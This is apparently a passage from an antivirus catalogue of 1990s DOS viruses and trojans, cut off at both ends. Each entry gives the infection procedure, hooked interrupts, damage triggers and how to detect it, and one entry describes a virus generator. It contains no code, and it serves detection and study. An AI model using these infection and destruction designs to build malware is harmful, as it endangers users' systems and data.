message appears if there is an I/O error (such as write protect). [CMDR] Virus Name: CMDR Virus Type: Memory Resident, File Virus (infects .COM files) Virus Length: 4096 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program) Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: None Detection method: Infected files increase by 4096 Bytes. Note: The CMDR virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [POX] Virus Name: POX Virus Type: Highest Memory Resident, File Virus (infects .COM files) Virus Length: 609 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 9h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory (highest memory) by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: POX hooks INT 9h, when the <Delete> key is pressed. The virus will check the system date; if DAY=24, it will format the hard disk. Detection method: Infected files increase by 609 Bytes. Note: The POX virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [SBC-1] Virus Name: SBC-1 Virus Type: Highest Memory Resident, File Virus (infects .COM files) Virus Length: No change PC Vectors Hooked: INT 21h (AX=4B00h) (execute program) Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory (highest memory) by hooking INT 21h. 2) It then checks whether the "COMMAND.COM" file has been infected; if "No", then it infects the file. 3) It then executes the original file. 4) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: Overwrites the original file, so the length of infected files won't increase. Detection method: None Note: The SBC-1 doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Nov_17-1] Virus Name: NOV_17-1 Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 768 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program) Infection Procedure: 1) This virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Infected files increase by 768 Bytes. Note: The NOV_17-1 virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [HBT] Virus Name: HBT Virus Type: Memory Resident, File Virus (infects .COM and .EXE files) Virus Length: 394 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program) Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: When the virus is resident in memory, a file can't be executed, but only infected. Detection method: Infected files increase by 394 Bytes. Note: The HBT virus doesn't hook INT 24h when infecting files. An error message appears if there is an I/O error (such as write protect). [Gotcha] Virus Name: GOTCHA Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 906 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory (highest memory) by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. 4) It also infects when a file is renamed, file attributes are set, search for a matching file or deleting a file. Damage: None Detection method: Infected files increase by 906 Bytes. Note: The Gotcha virus hooks INT 24h when infecting files. Omits I/O error (such as write protect). [Voronezh-2] Virus Name: VORONEZH-2 Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 1600 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Infected files increase by 1600 Bytes. Note: The Voronezh-2 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Amilia] Virus Name: AMILIA Virus Type: Memory Resident, File Virus (infects .COM and .EXE files) Virus Length: 1614 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: 1) If it is Sunday, a message is displayed on the screen: "Amilia I virii - [NUKE] 1991 By Rock Steady/NUKE," then the system halts. 2) If it is between 4 and 5 o'clock in the afternoon, a smiling face appears on the screen. Detection method: 1) Infected files increase by 1614 Bytes. 2) A smiling face appears on the screen. Note: The Amilia virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [981] Virus Name: 981 Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 981 Bytes (COM), about 1010 Bytes (EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks the DOS version; if the DOS version is earlier than 3.0 it will show the message: " This program requires MS-DOS 3.0 or later." 2) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory (highest memory) by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Infected .COM files increase by 981 Bytes, .EXE files increase by 1010 Bytes. Note: The 981 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Gotcha-2] Virus Name: GOTCHA-2 Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 627 Bytes (COM), 527 Bytes (EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. a) Before it infects a file, it will check the file name. Damage: None Detection method: Infected .COM files increase by 627 Bytes and .EXE files increase by 527 Bytes. Note: The Gotcha-2 virus hooks INT 24h and closes the "control_break" function when infecting files. It omits I/O errors (such as write protect). [Hungarian] Virus Name: HUNGARIAN Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 749 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h, INT 8h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory (highest memory) by hooking INT 21h. 2) If (Year=1990 and month >=6) then it will hook INT 8h. 3) It then executes the original file. 4) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: When Hungarian hooks INT 8h, it will set the Counter to 0xFFFF. Each time when INT 8h is called, the counter will decrease by one. When the counter equals zero (about one hour), it will begin to destroy files. Whenever you run any file, it will be destroyed. Detection method: Infected files increase by 749 Bytes. Note: The Hungarian virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [CK] Virus Name: CK Virus Type: Memory Resident, File Virus (infects .COM and .EXE files) Virus Length: 1163 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h, INT 13h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: The virus hooks INT 13h; some time later, the system will produce sounds. Detection method: Infected files increase by 1163 Bytes. Note: The CK virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [2136] Virus Name: 2136 Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 2136 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Infected files increase by 2136 Bytes. Note: The 2136 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Casteggi] Virus Name: CASTEGGI Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 2881 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h, INT 1Ch Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: When DAY>10, the virus will count time by hooking INT 1Ch. About 6 minutes later, the screen image will be destroyed. Detection method: Infected files increase by 2881 Bytes. Note: The Casteggi virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Enola] Virus Name: ENOLA Virus Type: Memory Resident, File Virus (infects .COM and .EXE files) Virus Length: 1865--1875 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h, INT 8h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: When the virus has stayed resident for 140 minutes and INT 21h has been called for more than 72 times, all data on the hard disk will be destroyed. Detection method: Infected files increase by 1865-1875 Bytes. Note: The Enola virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Ontari03] Virus Name: ONTARI03 Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 2048 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded in memory it will infect any uninfected file that is executed. Damage: None Detection method: Infected files increase by 2048 Bytes. Note: The Ontari03 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [PCBB-B] Virus Name: PCBB-B Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 3072 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory (highest memory) by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Infected files increase by 3072 Bytes. Note: The PCBB virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Canna615] Virus Name: CANNA615 Virus Type: Highest Memory Resident, File Virus (.COM and .EXE files) Virus Length: 1568 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then checks whether the system date is Friday, and Seconds is zero; if "Yes", then a message and a picture appear on the screen: "LEGALIZE CANNA615" and a picture of a hemp leaf. 3) It then executes the original file. 4) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Infected files increase by 1568 Bytes. Note: The Canna615 virus hooks INT 24h when infecting files. It omits I/O error (such as write protect). [Magnum] Virus Name: MAGNUM Virus Type: Memory Resident, File Virus (infects .COM and .EXE files) Virus Length: 2560 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h, INT 8h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Infected files increase by 2560 Bytes. Note: 1) The Magnum virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). 2) The virus only runs under DOS 3.3. [Lycee] Virus Name: LYCEE Virus Type: Memory Resident, File Virus (infects .COM and .EXE files) Virus Length: 1788 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h, INT 8h, INT 9h Execution Procedure: 1) Checks whether it resides in memory. If not, hooks INT 21h, INT 8h and INT 9h, installs itself as memory resident, and then executes the host program. 2) If the virus already resides in memory, it will proceed to execute the host program directly. Infection Procedure: 1) The virus Infects files by AH=4B in INT 21h. When an uninfected program is executed, it will get infected. 2) Lycee will hook INT 24h before infecting files to ignore I/O errors. Damage: If you haven't pressed any keys for a while (i.e., few minutes), a small window will appear on the screen until you press a key. Detection method: Infected files increase by 1788 Bytes. Note: The Lycee virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). Remarks: The virus does timing by INT 8h. When the keyboard is not hit for a certain period of time, the virus will open a small window on the screen until a key is pressed. [Brain2] Virus Name: BRAIN2 Virus Type: Memory Resident, File Virus (infects .COM and .EXE files) Virus Length: 1935 Bytes (COM and EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h, INT 1Ch Infection Procedure: 1) It checks whether the system date is the 17th of November or the 6th of February; if "Yes", it will display some messages and play music. 2) The virus then checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 3) It then executes the original file. 4) It then checks whether the system date is the 1st of February, July, September or December; if "yes", the virus will show a flash square by hooking INT 1Ch. 5) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: None Detection method: Infected files increase by 1935 Bytes. Note: The Brain2 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Antiprnt] Virus Name: ANTIPRNT Virus Type: Highest Memory Resident, File Virus (infects .EXE files) Virus Length: 593 Bytes (EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory (highest memory) by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. Damage: If the DOS Version is later than 3.0, and "PRINTER" is installed, then the virus will destroy data on the current disk. Detection method: Infected files increase by 593 Bytes. Note: The ANTIPRNT virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [ABC] Virus Name: ABC Virus Type: Highest Memory Resident, File Virus (infects .EXE files) Virus Length: 2912 Bytes (EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h, INT 1Ch, INT 16h Infection Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident in memory (highest memory) by hooking INT 21h, INT 1Ch, INT 16h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) Doesn't infect COM files and EXE files smaller than 20KB. Damage: When the system date is the 14th, and the virus has been in the memory for 55 minutes, the virus will destroy data on the hard disk. Detection method: Infected files increase by 2912 Bytes. Note: The ABC virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [CivilWar] Virus Name: Civilwar Virus Type: Highest Memory Resident, File Virus (infects .COM files) Virus Length: 599 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory (highest memory) by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: None Detection method: Infected files increase by 599 Bytes. Note: The Civilwar virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Leech] Virus Name: Leech Virus Type: Highest Memory Resident, File Virus (infects .COM files) Virus Length: 1024 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: None Detection method: Infected files increase by 1024 Bytes. Note: The Leech virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [302] Virus Name: 302 Virus Type: Highest Memory Resident, File Virus (infects .COM files) Virus Length: 302 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: None Detection method: Infected files increase by 302 Bytes. Note: The 302 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Little_Brother] Virus Name: Little_Brother Virus Type: Memory Resident, File Virus (Companion Virus) Virus Length: 250 Bytes (EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .COM files. Damage: When an uninfected file is executed, the virus will create a *.COM file with the same name as *.EXE file (example: run "AAA.EXE", "AAA.COM" will be created by Little_Brother). Detection method: Infected files increase by 250 Bytes. Note: The Little_Brother virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [ARCV-9] Virus Name: ARCV-9 Virus Type: Highest Memory Resident, File Virus (infects .COM files) Virus Length: 771 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: None Detection method: Infected files increase by 771 bytes. Note: The ARCV-9 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [NG-914] Virus Name: NG-914 Virus Type: Memory Resident, File Virus (infects .COM files) Virus Length: 914 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: None Detection method: Infected files increase by 914 Bytes. Note: The NG-914 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Civil510] Virus Name: Civil510 Virus Type: Highest Memory Resident, File Virus (infects .COM files) Virus Length: 2080 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: None Detection method: Infected files increase by 2080 Bytes. Note: The Civil510 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [B3] Virus Name: B3 Virus Type: Memory Resident, File Virus (infects .COM files) Virus Length: 483 Bytes (COM) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether the system date is the 26th of June; if "Yes", then it will destroy all data on the hard disk; if "No", the virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .EXE files. Damage: If the system date is the 26th of June, then the virus will destroy all data on the hard disk. Detection method: Infected files increase by 483 Bytes. Note: The B3 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [RKO-1] Virus Name: RKO-1 Virus Type: Memory Resident, File Virus Virus Length: None. PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether the system date is the 13th; if "Yes", it destroys all data on the hard disk; if "No", the virus checks whether it is already loaded resident in memory. If "No", it then loads itself into resident memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed or when INT 21h is called by AX=11h or AX=12h. Damage: If system date is the 13th, then the virus will destroy all data on the hard disk. Detection method: None Note: The RKO-1 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Dame] Virus Name: Dame Virus Type: Memory Resident, File Virus (Mutation Engine) Virus Length: None PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. 4) After it has infected files, it will check the time. If the time is between 12:00 A.M. and 12:30 A.M., it will show the message: "Don't worry, you are not alone at this hour.... This Virus is NOT dedicated to Sara. It's dedicated to her Groove (...That s my name).. This Virus is only a test therefor .. be ready for my Next Test..." Damage: None Detection method: None Note: 1) The Dame virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). 2) The virus will encode itself, before it infects files. And the method of encoding depends on the time. So it will be different in every file. [7thson] Virus Name: 7thson Virus Type: Memory Resident, File Virus (Companion) Virus Length: 321 or 307 Bytes (EXE) PC Vectors Hooked: INT 21h (AX=4B00h) (execute program), INT 24h Execution Procedure: 1) The virus checks whether it is already loaded resident in memory. If "No", it then loads itself resident into memory by hooking INT 21h. 2) It then executes the original file. 3) With itself loaded resident into memory it will infect any uninfected file that is executed. b) It doesn't infect .COM files. Damage: When you run an .EXE file, the virus will create a new .COM file with the same name as .EXE file and the length equals to 321 or 307 Bytes. Detection method: Check whether there are some COM files with length equal to 321 or 307 Bytes. Note: The 7thson virus hooks INT 24h and closes the "control_break" command when infecting files. It omits I/O errors (such as write protect). [Geoff] Virus Name: Geoff Virus Type: Trojan Virus Length: 5952 Bytes PC Vectors Hooked: INT 24h Execution Procedure: 1) Doesn't infect any file or partition or boot sector. 2) Before destruction, it shows the message: "Search And Destroy Loading v1.0 Bringing The Best And Latest Warex....... Press [ENTER] to Start The Game." 3) It then destroys all data of all disks if drives are ready. 4) After destroying , it shows the message: "Hey Geoff You know what happened a few days ago? Some friend asked me to get rid of you,........ P.S. I have nothing personal against you! You just FUCKED with the Cold Brother and I had to take you down, again." Damage: Destroys all data on all disks if drives are ready. Detection method: Check for files with length equal to 5952 Bytes. Note: 1) Doesn't stay resident in memory. 2) Geoff hooks INT 24h when destroying. It omits I/O errors (such as write protect). [CMOSKill] Virus Name: Cmoskill Virus Type: Trojan Virus Length: 29 Bytes PC Vectors Hooked: None Damage: Deletes all CMOS data Detection method: None Note: 1) Doesn't stay resident in memory. 2) Doesn't infect any files or partition or boot sector. [Killboot] Virus Name: Killboot Virus Type: Trojan Virus Length: 32000 Bytes PC Vectors Hooked: None Damage: Destroys all data in the BOOT SECTOR of C:\ and B:\, then shows a line of codes and then the system halts. Detection method: None Note: 1) Doesn't stay resident in memory. 2) Doesn't infect any files or partition. [NUKEX] Virus Name: NUKEX Virus Type: Trojan Virus Length: 469 Bytes PC Vectors Hooked: None Damage: Deletes all files on the hard disk (including all subdirectories). Detection method: None Note: 1) Doesn't stay resident in memory. 2) Doesn't infect any files or partition or boot sector. [Fire] Virus Name: Fire Virus Type: Trojan Virus Length: 4304 Bytes PC Vectors Hooked: INT 24h Damage: Destroys all data on all disks if drives are ready, then it makes a sound. Detection method: Check for files with length equal to 4304 Bytes. Note: 1) Doesn't stay resident in memory. 2) Doesn't infect any files or partition or boot sector. 3) The Fire virus hooks INT 24h when destroying. It omits I/O errors (such as write protect). [Secto] Virus Name: Secto Virus Type: Trojan Virus Length: 487 Bytes PC Vectors Hooked: None Damage: Destroys data on the boot sector of A:\. Detection method: None Note: 1) Doesn't stay resident in memory. 2) Doesn't infect any files or partition. 3) Doesn't hook INT 24h when destroying. An error message appears if there is an I/O error (such as write protect). [MSK] Virus Name: MSK Virus Type: Trojan Virus Length: 272 Bytes PC Vectors Hooked: None Damage: Destroys all data on the hard disk. Detection method: Check for files with length equal to 272 Bytes. Note: 1) Doesn't stay resident in memory. 2) Doesn't infect any files or partition or boot sector. [Dropper] Virus Name: Dropper Virus Type: Trojan Virus Length: 3103 Bytes PC Vectors Hooked: None Damage: Deletes all files on disks. Detection method: Check whether there are files with 3103 Bytes. Note: 1) Doesn't stay resident in memory. 2) Doesn't infect any files or partition or boot sector. 3) Dropper doesn't hook INT 24h when destroying. An error message appears if there is an I/O error ( such as write protect). [RNA#1] Virus Name: RNA#1 Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 7296 Bytes(COM and EXE) PC Vectors Hooked: INT 24h Execution Procedure: 1) Searches for COM and EXE files on the C:\ drive. 2) If found, it then deletes them (deletes four files at a time). 3) When the files are deleted, the virus will create a file named "ZSQA.TH" on drive C:\. Damage: It will delete files on the C:\ drive. Detection method: Infected files will increase by 7296 Bytes. Note: 1) Doesn't stay resident in memory. 2) The RNA#1 hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [RNA#2] Virus Name: RNA#2 Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 7408 Bytes (COM and EXE) PC Vectors Hooked: None Execution Procedure: 1) Searches for COM and EXE files on the C:\ drive. 2) The virus infects files four at a time. Damage: None Detection method: Infected files will increase by 7408 Bytes. Note: 1) Doesn't stay resident in memory. 2) RNA#2 doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Medical] Virus Name: Medical Virus Type: File Virus (infects .COM files) Virus Length: 189 Bytes (COM) PC Vectors Hooked: None Execution Procedure: 1) Searches for a .COM file in the current directory. 2) It checks whether it has been infected by Medical; if "Yes", it continues to look for another .COM file. 3) It only infects one file at a time. Damage: None Detection method: Infected files will increase by 189 Bytes. Note: Doesn't stay resident in memory. Medical doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Bob] Virus Name: Bob Virus Type: File Virus (infects .COM files) Virus Length: 1117 Bytes (COM) PC Vectors Hooked: INT 8h Execution Procedure: 1) Searches for a .COM file in the current directory. 2) It checks whether it has been infected by Bob. If "Yes", it continues to look for an uninfected .COM file. 3) It only infects three files at a time. 4) It then checks whether the system date is the 7th of September; if "Yes", the virus will hook INT 8h, and about 5 minutes later, one of the following messages is displayed on the screen: "Bob Ross lives!", "Bob Ross is watching!", "Maybe he lives here....." and so on. Damage: If it is September 7, then a message will appear on the screen. Detection method: Infected files will increase by 1117 Bytes. Note: 1) Doesn't stay resident in memory. 2) Bob doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Cannabis] Virus Name: Cannabis Virus Type: Floppy Boot Infector Virus Length: None. PC Vectors Hooked: INT 13h Execution Procedure: 1) When the system is booted from an infected disk, there will be a 1K decrease in the total system memory. 2) It then hooks INT 13h. 3) When you turn on the computer, the diskette will be infected by hooking INT 13h. Damage: None Detection method: Total memory size will decrease by 1K Bytes. Note: 1) Cannabis doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Daisy] Virus Name: Daisy Virus Type: File Virus (infects .EXE files) Virus Length: No change. PC Vectors Hooked: None Execution Procedure: 1) Displays a smiling face and a message on the screen: "Hi, I'm Crazy Daisy!... I'll format your HARD DISK! ... Say goodbye to your files!" 2) The virus then searches for an .EXE file in the A:\ drive. 3) It checks whether it has been infected by Daisy before. If "Yes", it continues to look for another uninfected .EXE file. 4) It infects all the .EXE files on the A:\ drive. 5) Then the system halts. Damage: 1) When all of the .EXE files on the A:\ drive have been infected, the system halts. 2) Overwrites original files, so the length of infected files won't increase. 3) When an infected file is executed, it randomly displays one of the following messages: "Pretty day today - isn't it?" "Don't worry - sing a song!" "Life isn't easy!" "Don't halt your computer! Let's be friends!" Detection method: None Note: 1) Doesn't stay resident in memory. 2) Daisy doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Son of PSMPC] Virus Name: SON_OF_PSMPC Virus Type: Virus Generator Virus Length: 17741 Bytes PC Vectors Hooked: None Execution Procedure: 1) This is a "virus generator." When you execute PC-MPC A.CFG B.CFG..., then A.ASM B.ASM..., are generated. These will be viruses after compiling and linking. Detection method: None Note: 1) Doesn't stay resident in memory. 2) SON_OF_PSMPC doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). 3) These generated files can have different functions such as encoding or infecting the COMMAND.COM file. [Ear] Virus Name: EAR Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 1024 Bytes PC Vectors Hooked: None Execution Procedure: 1) The virus searches for an .EXE or .COM file in the current directory. 2) It checks whether it has been infected by EAR. If "Yes", it continues to look for an uninfected .COM or .EXE file. 3) It continues infecting all COM and EXE files in the current and the "mother" directories until they are all infected. 4) It then checks whether the system date is the 1st day of the month; if "Yes", a message appears on the screen: " PHALON/SKISM 1992 [Ear-6] Alert! Where is the Auditory Canal located? 1. External Ear 2. Middle Ear 3. Inner Ear ", then waits for your choice. 5) If you press "1" or "3", you get the following message: " Wow, you own your ears! Please resume work.", then it executes the original file. 6) If you press "2" the following message appears: "You obviously no nothing about ears. Try again after some study.", then the program ends and doesn't execute the original file. Damage: If system date is the 1st day of the month, a message will appear on the screen. Detection method: Infected files will increase by 1024 Bytes. Note: 1) Doesn't stay resident in memory. 2) EAR doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Dir2-910] Virus Name: DIR2-910 Virus Type: File Virus (infects .COM and .EXE files) Virus Length: 1024 Bytes PC Vectors Hooked: None Execution Procedure: 1) When the virus loads itself resident in memory it will change the directory structure data, so that certain executable files are linked to itself. 2) When you execute a file to which the DIR2-910 virus has a link, the virus is also executed. At this point it can begin to infect other files. 3) The virus stays resident in memory but doesn't hook any interrupts. It uses another function to infect files. It infects .COM and .EXE files when they are "READ & WRITE". Damage: When all the .COM and .EXE files have been infected on a disk, then it will not be possible to execute any files from the disk. Detection method: Check the disk by using CHKDSK.EXE. If some files are crossed-linked to the same position, then these files must be infected. Note: DIR2-910 doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [INOK-2372] Virus Name: INOK-2372 Virus Type: File Virus (infects .COM files) Virus Length: 2372 Bytes PC Vectors Hooked: None Execution Procedure: 1) When the virus is executed , the following two functions are selected at random. a) It searches for a .COM file in the current directory. Then it checks whether it has been infected by INOK- 2372. If "Yes", it continues to look for 